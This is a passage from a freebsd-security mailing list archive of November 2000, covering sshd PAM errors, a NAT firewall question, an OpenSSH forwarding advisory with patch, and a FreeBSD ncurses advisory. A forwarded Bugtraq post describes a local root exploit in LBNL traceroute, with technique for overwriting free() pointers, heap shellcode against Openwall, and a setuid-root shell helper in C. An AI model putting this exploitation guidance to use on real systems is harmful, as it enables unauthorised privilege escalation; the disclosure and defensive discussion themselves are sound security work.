From owner-freebsd-security Sun Nov 12 0:18:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.bankom.omsk.su (mail.bankom.omsk.su [212.20.41.131]) by hub.freebsd.org (Postfix) with ESMTP id C491B37B4C5 for ; Sun, 12 Nov 2000 00:18:15 -0800 (PST) Received: from adg (adg.bankom.omsk.su [193.168.3.204]) by mail.bankom.omsk.su (8.9.3/8.9.1) with SMTP id OAA91124 for ; Sun, 12 Nov 2000 14:28:29 +0600 (OMST) Received: by localhost with Microsoft MAPI; Sun, 12 Nov 2000 14:19:18 -0000 Message-ID: <01C04CB3.8B6123B0.adg@bankom.omsk.su> From: Dmitry Achaev To: "'security@FreeBSD.ORG'" Subject: Re: sshd error's (new at this) Date: Sun, 12 Nov 2000 14:19:17 -0000 Organization: Omsk-Bank X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Okay so I want to have a machine be accessible only by ssh 2 and OpenSSH has >the license that works for my company. I tried to load the OpenSSH that >came with 4.1.1 port's but it said that I needed openssl installed. OpenSSL >was supposedly in the system and it would not install from the ports. So I >removed it and installed the newest OpenSSL (.9 something), no problems with >that. I then installed OpenSSH 2.3 (portable) and as far as I can see it >installed fine. So when I try to ssh as root to my own machine I get the >following : >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: >Permission denied >Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: >Permission denied >Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: >Permission denied >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service >Thanks in advance for any help, > Carlos Andrade >---- >Carlos A. Andrade >IS Manager >RJS Technologies >915.845.5228 ext 13 915.845.2119 fax >carlos@rjstech.com Most likely that you have a problem with /etc/pam.conf. In openssh2.3.xxx/contrib you can see a file sshd.pam.freebsd. >man pam.conf also good idea. ------ Dmitry Achaev System Administrator Omsk-Bank adg@bankom.omsk.su To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 12 20:48:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from algol.frenzy.com (cs16028-153.austin.rr.com [24.160.28.153]) by hub.freebsd.org (Postfix) with ESMTP id 26F7B37B479 for ; Sun, 12 Nov 2000 20:48:41 -0800 (PST) Received: (from dougmc@localhost) by algol.frenzy.com (8.9.3/8.9.3) id WAA11206 for FreeBSD-security@FreeBSD.org; Sun, 12 Nov 2000 22:48:40 -0600 Date: Sun, 12 Nov 2000 22:48:40 -0600 From: Doug McLaren Message-Id: <200011130448.WAA11206@algol.frenzy.com> To: FreeBSD-security@FreeBSD.org Subject: subscribe Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 10:44:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id AEF1537B4C5 for ; Mon, 13 Nov 2000 10:44:43 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA19018 for ; Mon, 13 Nov 2000 10:44:43 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19015; Mon Nov 13 10:44:40 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eADIiZq16380 for ; Mon, 13 Nov 2000 10:44:35 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdw16374; Mon Nov 13 10:43:41 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eADIheR11497 for ; Mon, 13 Nov 2000 10:43:40 -0800 (PST) Message-Id: <200011131843.eADIheR11497@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdi11492; Mon Nov 13 10:43:25 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2 (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 13 Nov 2000 10:43:25 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Do we need to concern ourselves about this? Traceroute in -stable is 1.3.2. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Date: Sun, 12 Nov 2000 20:16:45 +0100 Reply-To: Michel Kaempf Sender: Bugtraq List From: Michel Kaempf Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2 To: BUGTRAQ@SECURITYFOCUS.COM In-Reply-To: <20001106181050.A10333@via.ecp.fr>; from maxx@MASTERSECURITY.FR on Mon, Nov 06, 2000 at 06:10:52PM +0100 Resent-To: cy Resent-Date: Sun, 12 Nov 2000 22:20:44 -0800 Resent-From: Cy Schubert X-UIDL: \Ce!!G7("!2mF!!!9o"! - ---------------[ MasterSecuritY ]--------------- - -----------[ Local root exploit in LBNL traceroute - Part 2 ]----------- - ----------[ By Michel "MaXX" Kaempf ]---------- - --[ 0x00 - Table of contents ]---------------------------------------- -- 0x01 - Brief summary 0x02 - Updating the exploit 0x03 - The exploit versus Non-executable user stack area 0x04 - The exploit versus PaX 0x05 - Credits - --[ 0x01 - Brief summary ]-------------------------------------------- -- The first part of this advisory, available at: ftp://maxx.via.ecp.fr/traceroot/advisory described a known vulnerability in traceroute and a portable way of exploiting the problem. However, the first version of the exploit contained minor imperfections, and could not work against systems protected by the Linux kernel patches from the Openwall Project or the PaX Team. These three issues are discussed in this second part of the advisory. - --[ 0x02 - Updating the exploit ]------------------------------------- -- The new version of the traceroute exploit is available at: ftp://maxx.via.ecp.fr/traceroot/traceroot2.c Two minor imperfections were fixed: - - The memory address of the function pointer overwritten by the exploit, __free_hook, was part of the arch structure in the first version. However, this address will not necessarily be the same on two different computers running the very same operating system. This memory address was removed from the arch structure, and is now provided by the user thanks to the new victim command line argument. - - The first version of the exploit was unable to detect null bytes in the structures it built. The new version of the exploit will return an error if null bytes are found. A workaround exists: the structures can be split into many pieces, allowing null bytes thanks to the string terminators of the command line arguments passed to traceroute. However, the case where null bytes were present, and where no other valid victim could be chosen was never encountered, and that is why the workaround was not implemented. Moreover, "Red Hat Linux release 6.2 (traceroute 1.4a5) i386" support was added. Thanks to fish stiqz, teleh0r and Ady Wicaksono. - --[ 0x03 - The exploit versus Non-executable user stack area ]---------- The first version of the exploit could not work against systems protected by the Linux kernel patch from the Openwall Project (a.k.a. Solar Designer non-executable stack patch), available at: http://www.openwall.com/linux/ Thanks to Alex Khanin for notifying the problem. An exploit against i386 patched systems, which stores the shellcode in the heap instead of the stack, was written and is available at: ftp://maxx.via.ecp.fr/traceroot/openwall.c Following the example of the regular version of the traceroute exploit, the exploit against patched systems requires a few adjustments: - - filename: the full path where the suid traceroute binary can be found. - - p: the pointer returned to the savestr() function by the malloc(1024) call. Check out the first part of the advisory for more information. - - victim: the memory address where the function pointer overwritten by the exploit is stored. __free_hook is not a good choice on patched systems, as its most significant byte is null. The dynamic relocation record of the free() function is a better choice: % objdump -R /usr/sbin/traceroute | grep free 0804c88c R_386_JUMP_SLOT free - - program: the program executed after successful exploitation of traceroute. "/bin/sh" is a possibility, but "/tmp/sh" is another one: % cat /tmp/sh.c #include int main() { char * argv[] = { "/bin/sh", NULL }; setuid( 0 ); setgid( 0 ); execve( argv[0], argv, NULL ); return( -1 ); } - --[ 0x04 - The exploit versus PaX ]----------------------------------- -- The exploit will lose the fight. The return-into-libc technique, or any other technique virtually possible against PaX, will not work against traceroute. The PaX patch is available at: http://pageexec.virtualave.net/ When the exploit overwrites the pointer stored at the memory address foo with the pointer bar, it also overwrites the pointer stored at the memory address bar with the pointer foo (not exactly, two offsets are involved in this process, check out the first part of the advisory, or the unlink() macro used by free(), for more information). This is why a rwx memory page is needed, and (un)fortunately, PaX removes these pages. - --[ 0x05 - Credits ]-------------------------------------------------- -- Again, thanks to Pekka Savola, Chris Evans, Dvorak and Solar Designer. Thanks to Alex Khanin, Eugene Tsyrklevich, fish stiqz, teleh0r, Ady Wicaksono, Matthias Eckermann, Pierre Mondie, Samuel Hocevar and Olivier Thereaux. And thanks to the Securite.Org Team, for providing the best (french) security web site in the world. Check out: http://www.securite.org/ - -- Michel "MaXX" Kaempf ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 14:19:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 10AFB37B479 for ; Mon, 13 Nov 2000 14:19:11 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eADMIrK08053; Mon, 13 Nov 2000 14:18:53 -0800 (PST) (envelope-from kris) Date: Mon, 13 Nov 2000 14:18:53 -0800 From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2 (fwd) Message-ID: <20001113141852.A8013@citusc17.usc.edu> References: <200011131843.eADIheR11497@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011131843.eADIheR11497@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Mon, Nov 13, 2000 at 10:43:25AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Nov 13, 2000 at 10:43:25AM -0800, Cy Schubert - ITSD Open Systems G= roup wrote: > Do we need to concern ourselves about this? Traceroute in -stable is=20 > 1.3.2. It's discussion of an old (well, old in internet time, about a month or so ago) exploit in a later version of traceroute than we have (1.4.x). FreeBSD not vulnerable. Kris --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoQaMwACgkQWry0BWjoQKVPZgCeJ1l5y5VfyBFpcWrmv9bLtw3v ivgAnR77pWFR7qK2kOo72Cla6p6Be/kl =Owiy -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 14:46:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from pt-quorum.com (pt-quorum.com [209.10.167.210]) by hub.freebsd.org (Postfix) with ESMTP id E9EAD37B4C5 for ; Mon, 13 Nov 2000 14:46:54 -0800 (PST) Received: from n2 ([213.30.47.201]) by pt-quorum.com (8.9.3/8.9.3) with SMTP id WAA10652 for ; Mon, 13 Nov 2000 22:41:33 GMT Message-ID: <00c801c04dc4$12a89220$0200a8c0@n2> From: "Nuno Teixeira" To: Subject: PPP NAT Gateway security Date: Mon, 13 Nov 2000 22:50:05 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello to all, Recently I configured a FreeBSD box to act like a gateway for my NT workstation computers at my office have access to the Internet. I configured it in this way: ppp -background -nat MYISP It works OK and I have access to a lot of Internet services. My question is: do I need to configure this machine with firewall, so I can protect my internal network from the outside net? If I need so, please tell me a good place to start with firewalls for FreeBSD. Thanks very much, Nuno Teixeira To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 15: 1:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id CE85537B479 for ; Mon, 13 Nov 2000 15:01:50 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id PAA19836 for ; Mon, 13 Nov 2000 15:01:50 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19834; Mon Nov 13 15:01:37 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eADN1WW17740 for ; Mon, 13 Nov 2000 15:01:32 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdU17734; Mon Nov 13 15:00:56 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eADN0tf12406 for ; Mon, 13 Nov 2000 15:00:55 -0800 (PST) Message-Id: <200011132300.eADN0tf12406@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdy12395; Mon Nov 13 15:00:48 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: OpenSSH Security Advisory (adv.fwd) (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 13 Nov 2000 15:00:48 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Would it be possible to apply the patch in the following advisory before 4.2 is released? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Message-ID: <20001113211318.A27132@folly> Date: Mon, 13 Nov 2000 21:13:18 +0100 Reply-To: Markus Friedl Sender: Bugtraq List From: Markus Friedl Subject: OpenSSH Security Advisory (adv.fwd) X-To: misc@openbsd.org, security-announce@openbsd.org, openssh-unix-dev@mindrot.org X-cc: openssh@openssh.com To: BUGTRAQ@SECURITYFOCUS.COM Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Mon, 13 Nov 2000 14:41:11 -0800 Resent-From: Cy Schubert Hostile servers can force OpenSSH clients to do agent or X11 forwarding 1. Systems affected: All versions of OpenSSH prior to 2.3.0 are affected. 2. Description: If agent or X11 forwarding is disabled in the ssh client configuration, the client does not request these features during session setup. This is the correct behaviour. However, when the ssh client receives an actual request asking for access to the ssh-agent, the client fails to check whether this feature has been negotiated during session setup. The client does not check whether the request is in compliance with the client configuration and grants access to the ssh-agent. A similar problem exists in the X11 forwarding implementation. 3. Impact: Hostile servers can access your X11 display or your ssh-agent. 4. Short Term Solution: Clear both the $DISPLAY and the $SSH_AUTH_SOCK variable before connecting to untrusted hosts: % unset SSH_AUTH_SOCK; unset DISPLAY; ssh host 5. Solution: Upgrade to OpenSSH-2.3.0 or apply the attached patch. OpenSSH-2.3.0 is available from www.openssh.com. 6. Credits: Thanks to Jacob Langseth for pointing out the X11 forwarding issue. Appendix: Patch against openssh-2.2.0 - --- /openssh-2.2.0/clientloop.c Sun Aug 20 00:21:19 2000 +++ ssh/clientloop.c Fri Nov 10 13:54:42 2000 @@ -32,6 +32,8 @@ #include "buffer.h" #include "bufaux.h" +extern Options options; + /* Flag indicating that stdin should be redirected from /dev/null. */ extern int stdin_null_flag; @@ -750,7 +752,6 @@ int client_loop(int have_pty, int escape_char_arg, int ssh2_chan_id) { - - extern Options options; double start_time, total_time; int len; char buf[100]; @@ -993,7 +994,7 @@ debug("client_input_channel_open: ctype %s rchan %d win %d max %d", ctype, rchan, rwindow, rmaxpack); - - if (strcmp(ctype, "x11") == 0) { + if (strcmp(ctype, "x11") == 0 && options.forward_x11) { int sock; char *originator; int originator_port; @@ -1066,11 +1067,14 @@ dispatch_set(SSH_MSG_CHANNEL_OPEN_CONFIRMATION, &channel_input_open_co nfirmation); dispatch_set(SSH_MSG_CHANNEL_OPEN_FAILURE, &channel_input_open_failure ); dispatch_set(SSH_MSG_PORT_OPEN, &channel_input_port_open); - - dispatch_set(SSH_SMSG_AGENT_OPEN, &auth_input_open_request); dispatch_set(SSH_SMSG_EXITSTATUS, &client_input_exit_status); dispatch_set(SSH_SMSG_STDERR_DATA, &client_input_stderr_data); dispatch_set(SSH_SMSG_STDOUT_DATA, &client_input_stdout_data); - - dispatch_set(SSH_SMSG_X11_OPEN, &x11_input_open); + + dispatch_set(SSH_SMSG_AGENT_OPEN, options.forward_agent ? + &auth_input_open_request : NULL); + dispatch_set(SSH_SMSG_X11_OPEN, options.forward_x11 ? + &x11_input_open : NULL); } void client_init_dispatch_15() ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 15:38:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id EA75F37B479 for ; Mon, 13 Nov 2000 15:38:28 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eADNc4Y09447; Mon, 13 Nov 2000 15:38:04 -0800 (PST) (envelope-from kris) Date: Mon, 13 Nov 2000 15:38:03 -0800 From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH Security Advisory (adv.fwd) (fwd) Message-ID: <20001113153803.A9425@citusc17.usc.edu> References: <200011132300.eADN0tf12406@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OgqxwSJOaUobr8KG" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011132300.eADN0tf12406@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Mon, Nov 13, 2000 at 03:00:48PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --OgqxwSJOaUobr8KG Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Nov 13, 2000 at 03:00:48PM -0800, Cy Schubert - ITSD Open Systems G= roup wrote: > Would it be possible to apply the patch in the following advisory=20 > before 4.2 is released? Should be. Kris --OgqxwSJOaUobr8KG Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoQe1sACgkQWry0BWjoQKURjQCg0juHIBdwwyQk+2LznhSzW4gD w9EAn3E6ZNvuZveyb+cA+/jOqPIxzILc =OBVC -----END PGP SIGNATURE----- --OgqxwSJOaUobr8KG-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 15:55:37 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id B39D637B479; Mon, 13 Nov 2000 15:54:53 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses Reply-To: security-advisories@freebsd.org Message-Id: <20001113235453.B39D637B479@hub.freebsd.org> Date: Mon, 13 Nov 2000 15:54:53 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:68 Security Advisory FreeBSD, Inc. Topic: ncurses allows local privilege escalation Category: core Module: ncurses Announced: 2000-11-13 Affects: FreeBSD 5.0-CURRENT, 4.x prior to the correction date. FreeBSD 3.x vulnerability status currently unconfirmed. Corrected: 2000-10-11 (FreeBSD 4.1.1-STABLE) Credits: Jouko Pynnonen FreeBSD only: NO I. Background ncurses is a text-mode display library used for formatting the output of applications on a variety of terminals. It is externally maintained, contributed code which is included in FreeBSD by default. II. Problem Description There exists an overflowable buffer in the libncurses library in the processing of cursor movement capabilities. An attacker can force a privileged application to use the attacker's termcap file containing a specially crafted terminal entry, which will trigger the vulnerability when the vulnerable ncurses code is called. This allows them to execute arbitrary code on the local system with the privileges of the exploited binary. The systat utility included in the FreeBSD base system is known to use vulnerable ncurses routines. It runs with increased privileges as a member of the kmem group, which allows it to read from kernel memory (but not write to it). A process with the ability to read from kernel memory can monitor privileged data such as network traffic, disk buffers and terminal activity, and may be able to leverage this to obtain further privileges on the local system or on other systems, including root privileges. There may be other vulnerable applications included in the FreeBSD 4.x base system, but no others are confirmed to be vulnerable due to the difficulty in identifying a complete list of vulnerable ncurses functions. However the following is a complete list of FreeBSD system binaries which link against ncurses and run with increased privileges. They may or may not be vulnerable to exploitation. /usr/sbin/lpc /usr/bin/top /usr/bin/systat FreeBSD 3.x and earlier versions use a very old, customized version of ncurses which is difficult to update without breaking backwards-compatibility. The update was made for FreeBSD 4.0, but 3.x will not be updated to the newer version. At this stage the vulnerability has not been confirmed in FreeBSD 3.x. III. Impact Certain setuid/setgid software (including FreeBSD base system utilities and third party ports/packages) may be vulnerable to a local exploit yielding privileged access. The /usr/bin/systat utility is known to be vulnerable to this problem in ncurses. At this time is unknown whether /usr/bin/top and /usr/sbin/lpc are also affected. The problems were corrected prior to the release of FreeBSD 4.2. IV. Workaround It is not feasible to reliably detect binaries which are vulnerable to the ncurses vulnerability, however the provided utility will scan for privileged binaries which use ncurses and which may potentially be vulnerable. Some of the binaries reported may not in fact be vulnerable, but should be recompiled anyway for maximum assurance of security. Statically linked binaries which are identified as potentially vulnerable should be recompiled from source code if possible, after patching and recompiling libncurses, in order to correct the vulnerability. Dynamically linked binaries will be corrected by simply patching and recompiling libncurses as described below. As an interim measure, consider removing any identified setuid or setgid binary, removing set[ug]id privileges from the file, or limiting the file access permissions, as appropriate. Of course, it is possible that some of the identified files may be required for the correct operation of your local system, in which case there is no clear workaround except for limiting the set of users who may run the binaries, by an appropriate use of user groups and removing the "o+x" file permission bit. 1) Download the 'scan_ncurses.sh' and 'test_ncurses.sh' scripts from ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh e.g. with the fetch(1) command: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh Receiving scan_ncurses.sh (381 bytes): 100% 381 bytes transferred in 0.1 seconds (7.03 kBps) # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh Receiving test_ncurses.sh (604 bytes): 100% 604 bytes transferred in 0.1 seconds (6.55 kBps) 2) Verify the md5 checksums and compare to the value below: # md5 scan_ncurses.sh MD5 (scan_ncurses.sh) = 597f63af701253f053581aa1821cbac1 # md5 test_ncurses.sh MD5 (test_ncurses.sh) = 12491ceb15415df7682e3797de53223e 3) Run the scan_ncurses.sh script against your system: # chmod a+x ./test_ncurses.sh # sh scan_ncurses.sh ./test_ncurses.sh / This will scan your entire system for setuid or setgid binaries which make use of the ncurses library. Each returned binary should be examined (e.g. with 'ls -l' and/or other tools) to determine what security risk it poses to your local environment, e.g. whether it can be run by arbitrary local users who may be able to exploit it to gain privileges. 4) Remove the binaries, or reduce their file permissions, as appropriate. V. Solution Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE after the correction date, or patch your present system source code and rebuild. Then run the scan_ncurses.sh script as instructed in section IV and identify any statically-linked binaries as reported by the script. These should either be removed, recompiled, or have privileges restricted to secure them against this vulnerability (since statically-linked binaries will not be affected by simply recompiling the shared libncurses library). To patch your present system: download the updated ncurses code from the below location, and execute the following commands as root: # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz.asc Verify the detached PGP signature using your PGP utility. cd /usr/src tar xvfz /path/to/ncurses.tar.gz cd /usr/src/lib/libncurses make all make install In contrast to the usual practise, a simple patch fixing the security vulnerability is not provided because the vendor did not make one available, and the updated ncurses snapshot which fixed the vulnerability contains numerous other changes whose purpose and relation to the fix was unclear. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOhB+8lUuHi5z0oilAQHjtwP9EIqTrWGcF4hzT7o7CrqGSTBWkQ6QhH2g DfIef15FLYXOoFImpyi1Jlk0V5RcuTTWez+Kpj8/+Yk3+TYuoYT1k08k1YBuBlCH HYGvhTAdTO9lflUS6uxZzmiRL3ZOjHPS5OXA6ualnaohMVvBjq/f3V7/cSYZLZ1p KmHPlYgvFPA= =SlgT -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 16:11:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.whc.net (ns.whc.net [204.90.111.5]) by hub.freebsd.org (Postfix) with ESMTP id 66C1B37B479 for ; Mon, 13 Nov 2000 16:11:41 -0800 (PST) Received: from null ([206.249.222.250]) by smtp.whc.net (8.10.1/8.10.1/kbp) with SMTP id for ; Mon, 13 Nov 2000 17:10:29 -0700 (MST) Reply-To: From: "Carlos Andrade" To: Subject: more pestering from the newbie Date: Mon, 13 Nov 2000 17:09:41 -0700 Message-ID: <000a01c04dcf$30149c40$fadef9ce@copyco.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on OpenSSH. When I goto /usr/ports/security/openssh and do :make install it states that OpenSSH needs the openssl library so I go to /usr/ports/security/openssl :make install the system reports that Openssl is already in the base system So what is the deal? I installed all the ports and added lynx and bash. That and configuring tcp_wrappers. Nothing else. Why am I getting this error? my thanks in advance, Carlos Andrade ---- Carlos A. Andrade IS Manager RJS Technologies 915.845.5228 ext 13 915.845.2119 fax carlos@rjstech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 16:23:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.techometer.net (techometer.net [216.240.169.101]) by hub.freebsd.org (Postfix) with ESMTP id C086837B479 for ; Mon, 13 Nov 2000 16:23:36 -0800 (PST) Received: (from emechler@localhost) by lucifer.techometer.net (8.11.1/8.11.1) id eAE0NN150488; Mon, 13 Nov 2000 16:23:23 -0800 (PST) Date: Mon, 13 Nov 2000 16:23:23 -0800 From: Erick Mechler To: Carlos Andrade Cc: security@FreeBSD.ORG Subject: Re: more pestering from the newbie Message-ID: <20001113162323.C50021@lucifer.techometer.net> References: <000a01c04dcf$30149c40$fadef9ce@copyco.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000a01c04dcf$30149c40$fadef9ce@copyco.com>; from Carlos Andrade on Mon, Nov 13, 2000 at 05:09:41PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you're running 4.1.1 then OpenSSL and OpenSSH are installed into the base system, as the error message states. You shouldn't have to install any ports to get either Open{SSL,SSH} to work. ssh is in /usr/bin/ssh; openssl is in /usr/bin/openssl. --Erick At Mon, Nov 13, 2000 at 05:09:41PM -0700, Carlos Andrade said this: :: I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on :: OpenSSH. When I goto /usr/ports/security/openssh and do :: :make install :: it states that OpenSSH needs the openssl library :: :: so I go to /usr/ports/security/openssl :: :make install :: the system reports that 